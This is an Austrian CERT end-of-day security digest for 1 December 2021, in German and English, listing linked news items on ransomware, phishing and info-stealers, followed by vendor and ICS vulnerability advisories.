End-of-Day report
Timeframe: Dienstag 30-11-2021 18:00 - Mittwoch 01-12-2021 18:00
Handler: Wolfgang Menezes
Co-Handler: Thomas Pribitzer
News
Microsoft Exchange servers hacked to deploy BlackByte ransomware
BlackByte ransomware actors were observed exploiting the ProxyShell set of vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) to compromise Microsoft Exchange servers.
https://www.bleepingcomputer.com/news/security/microsoft-exchange-servers-hacked-to-deploy-blackbyte-ransomware/
Info-Stealer Using webhook.site to Exfiltrate Data, (Wed, Dec 1st)
We already reported multiple times that, when you offer an online (cloud) service, there are a lot of chances that it will be abused for malicious purposes. I spotted an info-stealer that exfiltrates data through webhook.site.
https://isc.sans.edu/diary/rss/28088
Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file.
https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread
l+f: Emotet-Fehlalarm vom Microsoft Defender
Microsofts Virenschutz hat Nutzer und Administratoren unnötig aufgeschreckt: Ein fehlerhaftes Erkennungs-Update sah Emotet-Infektionen, wo keine waren.
https://heise.de/-6280766
Tracking a P2P network related with TA505
For the past few months, NCC Group has been tracking very closely the operations of TA505 and the development of different projects (e.g. Clop) by them.
https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/
Vulnerability Spotlight: Use-after-free condition in Google Chrome could lead to code execution
Cisco Talos recently discovered an exploitable use-after-free vulnerability in Google Chrome.
http://blog.talosintelligence.com/2021/12/vuln-spotlight-chrome-.html
E-Mail: -Ihr Paket ist in der Warteschleife- ist Fake
Warten Sie gerade auf ein Paket? Dann nehmen Sie sich vor E-Mails mit dem Betreff -Ihr Paket ist in der Warteschleife- in Acht. Kriminelle geben sich als DHL aus und behaupten, dass Zollgebühren ausständig sind.
https://www.watchlist-internet.at/news/e-mail-ihr-paket-ist-in-der-warteschleife-ist-fake/
Play Your Cards Right: Detecting Wildcard DNS Abuse
Wildcard DNS records can be used constructively, but their flexibility also provides attackers with a variety of options for executing attacks.
https://unit42.paloaltonetworks.com/wildcard-dns-abuse/
Shodan Verified Vulns 2021-12-01
Insgesamt gibt es kaum Veränderungen zum Vormonat, wobei die Anzahl der verwundbaren Microsoft Exchange Server relativ deutlich zurückging - Props an die Administrator:innen!
https://cert.at/de/aktuelles/2021/12/shodan-verified-vulns-2021-12-01
CISA Adds Five Known Exploited Vulnerabilities to Catalog
CISA has added five new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below.
https://us-cert.cisa.gov/ncas/current-activity/2021/12/01/cisa-adds-five-known-exploited-vulnerabilities-catalog
FBI document shows what data can be obtained from encrypted messaging apps
A recently discovered FBI training document shows that US law enforcement can gain limited access to the content of encrypted messages from secure messaging services like iMessage, Line, and WhatsApp, but not to messages sent via Signal, Telegram, Threema, Viber, WeChat, or Wickr.
https://therecord.media/fbi-document-shows-what-data-can-be-obtained-from-encrypted-messaging-apps/
Vulnerabilities
IBM Security Bulletins 2021-11-30
IBM QRadar SIEM, IBM Integration Bus, IBM App Connect Enterprise, IBM HTTP Server, IBM Cloud Pak for Data, IBM Watson Discovery for IBM Cloud Pak for Data, IBM Match 360, IBM SDK (Java- Technology Edition), IBM WebSphere Application Server
https://www.ibm.com/blogs/psirt/
Security updates for Wednesday
Security updates have been issued by Debian (rsync, rsyslog, and uriparser), Fedora (containerd, freeipa, golang-github-containerd-ttrpc, libdxfrw, libldb, librecad, mingw-speex, moby-engine, samba, and xen), Red Hat (kernel, kernel-rt, kpatch-patch, and samba), and Ubuntu (linux, linux-aws, linux-aws-5.11, linux-azure, linux-azure-5.11, linux-gcp, linux-gcp-5.11, linux-hwe-5.11, linux-kvm, linux-oracle, linux-oracle-5.11, linux-raspi, linux, linux-aws, linux-aws-5.4, linux-azure, linux-gcp, [...])
https://lwn.net/Articles/877284/
Verwaltungssoftware Jamf Pro für Apple-Geräte könnte Zugangsdaten leaken
https://heise.de/-6281352
Security Advisory - Buffer Overflow Vulnerability in Some Huawei Products
http://www.huawei.com/en/psirt/security-advisories/2021/huawei-sa-20211201-01-buffer-en
XSS Vulnerability Patched in Plugin Designed to Enhance WooCommerce
https://www.wordfence.com/blog/2021/12/xss-vulnerability-patched-in-plugin-designed-to-enhance-woocommerce/
Mozilla Foundation Security Advisory 2021-51: Memory corruption in NSS via DER-encoded DSA and RSA-PSS signatures
https://www.mozilla.org/en-US/security/advisories/mfsa2021-51/
Mitsubishi Electric MELSEC and MELIPC Series
https://us-cert.cisa.gov/ics/advisories/icsa-21-334-02
Johnson Controls CEM Systems AC2000
https://us-cert.cisa.gov/ics/advisories/icsa-21-334-04
Hitachi Energy Retail Operations and CSB Software
https://us-cert.cisa.gov/ics/advisories/icsa-21-334-05